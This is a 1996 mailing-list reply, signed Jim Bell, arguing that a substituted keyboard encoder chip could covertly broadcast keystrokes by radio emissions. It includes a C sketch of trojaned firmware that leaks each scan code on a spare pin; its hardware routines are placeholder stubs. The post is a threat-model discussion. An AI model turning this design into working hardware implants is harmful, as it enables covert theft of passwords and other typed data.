
Re: trusting the processor chip



At 01:53 PM 4/25/96 -0400, Jeffrey C. Flynn wrote:

>I received several responses to this question.  My favorite was as follows...
>
>>This is probably science fiction, particularly at the VHDL level.
>>Maybe someone could make a crime of opportunity out of a microcode
>>flaw, but there's a risk of it being found out during testing.
>>
>>To do it right would require collusion of the design and test teams.
>>They need to ensure the back door stays closed, isn't tickled by
>>"normal" testing and only opens when really requested. So a lot of
>>people are in on the secret even before it gets exploited for
>>nefarious purposes.
>>
>>And what nefarious purposes would pay for the risks and costs of this?
>>If the secret got out, the design team, product line, and company
>>would be dead in the marketplace and probably spend the rest of their
>>lives responding to lawsuits. What could you use this for that is
>>worth the risk?

This analysis seems to assume that the entire production run of a standard 
product is subverted.  More likely, I think, an organization like the NSA 
might build a pin-compatible version of an existing, commonly-used product, 
such as a keyboard encoder chip, designed to transmit (by RFI signals) the 
contents of whatever is typed at the keyboard.  It's simple, it's hard to 
detect, and it gets what they want.
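
To make this concrete, here is a minimal sketch (in C, and purely 
hypothetical) of what the firmware inside such a substituted keyboard 
encoder might look like.  Every name in it -- scan_keyboard, send_to_host, 
drive_spare_pin, delay_us -- is a placeholder assumed for illustration, 
standing in for ordinary port I/O on a small microcontroller.  The point 
is only that leaking each scan code as a slow bit-stream on an otherwise 
unused output pin takes a few dozen instructions, not an exotic design.

/*
 * Hypothetical sketch of trojaned keyboard-encoder firmware.
 * The helper routines are placeholder assumptions, not any real
 * chip's interface; they stand in for simple port reads/writes.
 */
#include <stdint.h>

static uint8_t scan_keyboard(void)      { return 0; }  /* 0 = no key pressed */
static void    send_to_host(uint8_t c)  { (void)c;  }  /* the chip's normal job */
static void    drive_spare_pin(int lvl) { (void)lvl; } /* unused output pin */
static void    delay_us(unsigned us)    { (void)us;  } /* crude busy-wait */

/* Leak one byte as a slow on/off-keyed serial stream on the spare pin.
 * The pin's switching transients radiate; a nearby receiver tuned to
 * the right band recovers the bits.  Even ~1 kbit/s far exceeds any
 * typing rate, so the leak adds no visible latency at the keyboard. */
static void rf_leak_byte(uint8_t b)
{
    drive_spare_pin(1); delay_us(1000);       /* start bit */
    drive_spare_pin(0); delay_us(1000);
    for (int i = 7; i >= 0; i--) {
        drive_spare_pin((b >> i) & 1);        /* data bits, MSB first */
        delay_us(1000);
    }
    drive_spare_pin(0);                       /* return to idle */
}

void encoder_main_loop(void)
{
    for (;;) {
        uint8_t code = scan_keyboard();
        if (code != 0) {
            send_to_host(code);   /* behaves exactly like the genuine part */
            rf_leak_byte(code);   /* the only addition */
        }
    }
}

At the host interface the part is electrically indistinguishable from the 
genuine article, which is what would make a substitution attack of this 
kind attractive compared with subverting an entire production run.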

Jim Bell
[email protected]